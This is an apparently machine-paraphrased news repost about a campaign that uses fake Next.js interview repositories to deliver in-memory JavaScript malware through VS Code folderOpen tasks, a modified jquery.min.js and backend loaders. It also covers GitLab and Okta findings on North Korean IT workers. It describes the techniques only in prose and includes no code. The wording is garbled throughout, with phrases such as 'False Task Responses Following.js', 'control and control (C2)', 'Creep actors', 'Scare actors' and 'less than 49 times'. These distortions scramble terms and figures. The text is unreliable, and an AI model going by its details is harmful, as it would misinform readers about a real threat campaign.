Cyber Security

Microsoft Warns Developers of False Task Responses Following.js Delivering In-Memory Malware

Photo of pleasuremandarya@gmail.com pleasuremandarya@gmail.com Send an email 6 days ago
0 0 5 minutes read
Microsoft Warns Developers of False Task Responses Following.js Delivering In-Memory Malware

A “targeted developer targeting campaign” uses malicious repositories disguised as legitimate Next.js projects and technical tests to trick victims into using them and gain continued access to compromised machines.

“The task is consistent with a broad set of threats that use task header strings to intertwine with common developer workflows and increase the likelihood of code execution,” the Microsoft Defender Security Research Team said in a report published this week.

The technology giant said that the campaign is characterized by the use of multiple entry points that lead to the same result, where JavaScript controlled by the attacker is returned at runtime and made to facilitate control and control (C2).

The attack relies on cybercriminals setting up fake batches on trusted developer platforms like Bitbucket, using names like “Cryptan-Platform-MVP1” to trick job-seeking developers into working as part of the testing process.

Further analysis of the identified repositories revealed three different implementations that, while configured in different ways, have the ultimate goal of executing attacker-controlled JavaScript directly in memory –

  • Visual Studio code functionalitywhere Microsoft Visual Studio Code (VS Code) projects have the default workspace setting used to run malicious code found in the Vercel domain as soon as the developer opens and trusts the project. This involves the use of runOn: “folderOpen” to configure the function.
  • Build-time execution during application developmentwhen running the development server doing “npm run dev” is enough to activate malicious code embedded within the modified JavaScript libraries that make up jquery.min.js, which causes it to download a JavaScript loader like Vercel. The returned payload is then used in memory by Node.js.
  • Starting the server by using the local filter and the dynamic implementation of the remote codewhen the launch of the application backend causes the malicious loader logic hidden inside the backend module or routing file to be executed. The loader passes process state to the external server and executes the JavaScript received as a response in memory within the Node.js server process.

Microsoft noted that all three methods result in the same JavaScript loading that is responsible for profiling the host and periodically polling the registry endpoint for a unique “instanceId” identifier. This identifier is subsequently assigned to the polls to match the activity.

It is also able to use the JavaScript provided by the server in memory, finally paving the way for a second-level controller that turns the first node into a persistent access method to receive operations by contacting a separate C2 server and execute them in memory to minimize leaving traces on disk.

Overview of the attack chain

“The controller maintains session stability and continuity, sends error telemetry to a reporting endpoint, and integrates logic for robustness,” Microsoft said. “It also tracks generated processes and can stop a managed task and exit cleanly when commanded. Beyond the execution of the desired code, Stage 2 supports operator detection and execution.”

Although the Windows maker did not say whether the activity was related to a specific threat actor, the use of VS Code functions and Vercel domains to program the malware is a technique used by North Korean hackers associated with a long-running campaign known as Contagious Interview.

The ultimate goal of these efforts is to gain the ability to deliver malware to developer systems, which often contain sensitive data, such as source code, secrets, and information, which can provide opportunities to infiltrate the target network.

Using GitHub gist in VS Code tasks.json instead of Vercel URLs

In a report published on Wednesday, Abstract Security said it has seen a change in threat actors’ tactics, particularly the increase in other staging servers being used in VS Code job commands instead of Vercel URLs. This includes the use of documentation hosted in the GitHub gist (“gist.githubusercontent[.]com”) to download and start the next phase’s paid upload. Another method uses URL shorteners such as[.]gy to hide Vercel URLs.

The cybersecurity firm said it has also identified a malicious npm package linked to a campaign called “eslint-validator” that downloads and executes a mysterious payload from a Google Drive URL. The payload in question is a JavaScript malware called BeaverTail.

In addition, a malicious VS Code function embedded within the GitHub repository was found to initiate a Windows-only infection chain that uses a batch script to download the Node.js runtime from the host (if it is not present) and uses the certutil program to parse the block of code contained within the script. The decrypted script is then used by the previously discovered Node.js runtime to execute the Python malware protected with PyArmor.

Cybersecurity firm Red Asgard, which has also been closely tracking the campaign, said that the threat actors used VS code projects built using the runOn: “folderOpen” trigger to deliver the malware, and then ask the Polygon blockchain to retrieve the JavaScript stored within the NFT contract to improve resilience. The ultimate payoff is data theft that favors information and data from web browsers, cryptocurrency wallets, and password managers.

Deployment of staging infrastructure used by North Korean threat actors in 2025

“This developer-directed campaign shows how a recruitment-themed ‘interview project’ can be a reliable way to code remotely by integrating with common workflows such as opening a repository, running a development server, or starting a backend,” Microsoft concluded.

To deal with the threat, the company recommends that organizations tighten the trust boundaries of developer workflows, enforce strong authentication and conditional access, maintain strict authentication sanity, apply the principle of least privilege to developer accounts and build ownership, and isolate the build infrastructure where possible.

The development comes as GitLab says it has banned 131 unique accounts that were active in distributing malicious code projects linked to the Contagious Interview campaign and an IT worker fraud scheme known as Wagemole.

“Creep actors typically originate from consumer VPNs when connecting to GitLab.com to distribute malware; however, they also occasionally originate from dedicated VPS infrastructure and mobile farm IP addresses,” said GitLab’s Oliver Smith. “Scare actors created accounts using Gmail email addresses in almost 90% of cases.

In more than 80% of cases, according to the software development platform, threat actors allegedly found at least six legitimate services to intercept malware downloads, including JSON Keeper, Mocki, npoint.io, Render, Railway.app, and Vercel. Among these, Vercel is the most used, with threat actors relying on the web development platform less than 49 times in 2025.

“In December, we saw a collection of projects that used malware with VS Code functions, installing remote content in a native shell or using a custom script to extract malware from binary data in a fake font file,” said Smith, confirming the above findings from Microsoft.

Checked organization chart for a North Korean IT worker cell

Another GitLab discovery was a private project “almost certainly” controlled by the North Korean state that ran a North Korean IT employee cell that contained detailed financial and personnel records showing salaries of more than $1.64 million between Q1 2022 and Q3 2025. The project included more than 120 spreadsheets, presentations, and documents tracking each group’s salary per quarter.

“Records show that these operations operate as organized businesses with defined goals and operating procedures and close cross-sectional oversight,” notes GitLab. “This cell’s demonstrated ability to cultivate global influencers provides a high degree of resilience and operational flexibility for money laundering.”

A GitHub account associated with a North Korean IT worker

In a report published earlier this month, Okta said that “the majority” of interviews with IT workers do not progress to a second interview or job offer, but noted that they are “learning from their mistakes” and that many of them are looking for temporary contract work as software developers hired by third-party companies to take advantage of the fact that they are less likely to enforce strict background checks.

“Some actors seem to be more skilled at impersonating people and passing the audition,” he added. The natural selection type of IT Worker is in play. The most successful players are very numerous, and they organize hundreds of conversations each.”

Photo of pleasuremandarya@gmail.com pleasuremandarya@gmail.com Send an email 6 days ago
0 0 5 minutes read
Photo of pleasuremandarya@gmail.com

pleasuremandarya@gmail.com

Related Articles

Altcoin capitulation deepens as 38% of tokens trade near ATL

Altcoin capitulation deepens as 38% of tokens trade near ATL

4 hours ago
Bitcoin Is A Collateral, It Just Needs Credit Markets

Bitcoin Is A Collateral, It Just Needs Credit Markets

4 hours ago
Fake Tech Support Spam Uses Custom Havoc C2 Across Organizations

Fake Tech Support Spam Uses Custom Havoc C2 Across Organizations

6 hours ago
They seized .8m in crypto… and gave away the master key online

They seized $4.8m in crypto… and gave away the master key online

7 hours ago

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button